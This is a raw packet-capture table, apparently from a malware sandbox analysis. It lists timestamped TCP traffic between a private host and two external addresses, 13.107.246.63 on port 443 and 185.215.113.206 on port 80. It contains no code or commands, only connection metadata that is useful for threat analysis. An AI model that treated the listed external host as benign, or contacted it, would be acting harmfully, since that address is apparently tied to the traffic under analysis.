Dec 7, 2024 12:59:48.113454103 CET	49799	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:48.113603115 CET	49799	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:48.113620996 CET	443	49799	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:48.113631964 CET	49799	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:48.113636971 CET	443	49799	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:48.116453886 CET	49804	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:48.116491079 CET	443	49804	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:48.116575956 CET	49804	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:48.116746902 CET	49804	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:48.116758108 CET	443	49804	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:48.148174047 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.148271084 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.148336887 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.148381948 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.148674965 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.148721933 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.149224043 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.149276972 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.149701118 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.149753094 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.150116920 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.150188923 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.150593996 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.150661945 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.150890112 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.150930882 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.151473999 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.151520014 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.151647091 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.151689053 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.152179956 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.152225971 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.152391911 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.152442932 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.152993917 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.153034925 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.153187037 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.153230906 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.153737068 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.153795958 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.153912067 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.153958082 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.154433966 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.154478073 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.154676914 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.154721022 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.155276060 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.155333042 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.155513048 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.155554056 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.156114101 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.156156063 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.156388044 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.156434059 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.156976938 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.157021046 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.157332897 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.157378912 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.157984018 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.158029079 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.158118963 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.158162117 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.158715010 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.158771992 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.158886909 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.158935070 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.159574032 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.159619093 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.159759998 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.159801006 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.160422087 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.160466909 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.160687923 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.160732031 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.161365032 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.161408901 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.161518097 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.161562920 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.209299088 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.209378958 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.209469080 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.209518909 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.209851980 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.209901094 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.210195065 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.210242987 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.210577011 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.210621119 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.210967064 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.211016893 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.211316109 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.211369038 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.211657047 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.211700916 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.212162018 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.212212086 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.212379932 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.212428093 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.212923050 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.212970972 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.248819113 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.336740017 CET	443	49801	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:48.336802959 CET	443	49801	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:48.336862087 CET	49801	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:48.337086916 CET	49801	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:48.337100983 CET	443	49801	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:48.337112904 CET	49801	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:48.337120056 CET	443	49801	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:48.339807987 CET	49805	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:48.339834929 CET	443	49805	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:48.339907885 CET	443	49800	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:48.339921951 CET	49805	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:48.339975119 CET	443	49800	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:48.340018034 CET	49800	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:48.340075970 CET	49805	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:48.340090036 CET	443	49805	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:48.340244055 CET	49800	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:48.340256929 CET	443	49800	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:48.340266943 CET	49800	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:48.340271950 CET	443	49800	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:48.342480898 CET	49806	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:48.342510939 CET	443	49806	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:48.342603922 CET	49806	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:48.342742920 CET	49806	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:48.342755079 CET	443	49806	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:48.369307995 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.502934933 CET	443	49802	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:48.503021955 CET	443	49802	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:48.503062963 CET	49802	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:48.503227949 CET	49802	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:48.503238916 CET	443	49802	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:48.503268003 CET	49802	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:48.503273964 CET	443	49802	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:48.505842924 CET	49807	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:48.505860090 CET	443	49807	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:48.505929947 CET	49807	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:48.506079912 CET	49807	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:48.506092072 CET	443	49807	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:48.562041044 CET	443	49803	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:48.562568903 CET	49803	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:48.562580109 CET	443	49803	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:48.562903881 CET	49803	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:48.562910080 CET	443	49803	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:48.691565990 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.691696882 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.691740036 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.691740036 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.692404985 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.692451954 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.692589998 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.692629099 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.692960978 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.693015099 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.693332911 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.693382978 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.693737030 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.693782091 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.694246054 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.694294930 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.694477081 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.694524050 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.694808960 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.694860935 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.695350885 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.695394039 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.695584059 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.695631981 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.696106911 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.696168900 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.696290970 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.696335077 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.696949005 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.696995974 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.697156906 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.697227001 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.697741032 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.697784901 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.697937965 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.697984934 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.698676109 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.698723078 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.699049950 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.699090958 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.699441910 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.699487925 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.699820042 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.699862957 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.700232029 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.700274944 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.700560093 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.700604916 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.701026917 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.701072931 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.701297045 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.701338053 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.701884985 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.701925993 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.702264071 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.702315092 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.702704906 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.702750921 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.702919960 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.702966928 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.703505039 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.703548908 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.703685999 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.703728914 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.704392910 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.704438925 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.704575062 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.704621077 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.705137968 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.705183983 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.705306053 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.705351114 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.823075056 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.823141098 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.823209047 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.823251009 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.823308945 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.823349953 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.823827028 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.823869944 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.824126005 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.824171066 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.824418068 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.824459076 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.824929953 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.824969053 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.825202942 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.825243950 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.826329947 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.826380968 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.826445103 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.826484919 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.826823950 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.826873064 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.827168941 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.827220917 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.827550888 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.827593088 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.827908993 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.827953100 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.828284025 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.828320026 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.828643084 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.828682899 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.828994989 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.829037905 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.829390049 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.829433918 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.829854965 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.829902887 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.830408096 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.830441952 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.830924988 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.830967903 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.831176996 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.831218958 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.831618071 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.831660986 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.831743956 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.831789970 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.832348108 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.832395077 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.832525015 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.832561970 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.833201885 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.833254099 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.833416939 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.833453894 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.833967924 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.834012985 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.834175110 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.834214926 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.834903955 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.834944010 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.835078955 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.835123062 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.835622072 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.835671902 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.835807085 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.835849047 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.836410046 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.836456060 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.836622000 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.836664915 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.837275028 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.837323904 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.837460995 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.837507010 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.838115931 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.838156939 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.838285923 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.838325024 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.838886023 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.838951111 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.839087963 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.839135885 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.839771986 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.839823961 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.839996099 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.840032101 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.840557098 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.840600967 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.840775967 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.840822935 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.841381073 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.841424942 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.841582060 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.841618061 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.842185020 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.842225075 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.842390060 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.842437029 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.843007088 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.843046904 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.843245983 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.843297005 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.843831062 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.843871117 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.844041109 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.844084024 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.844656944 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.844700098 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.844849110 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.844890118 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.845494032 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.845535994 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.845688105 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.845727921 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.846298933 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.846348047 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.846524954 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.846571922 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.847137928 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.847177982 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.847342014 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:48.847378969 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:48.847943068 CET	80	49788	185.215.113.206	192.168.2.7
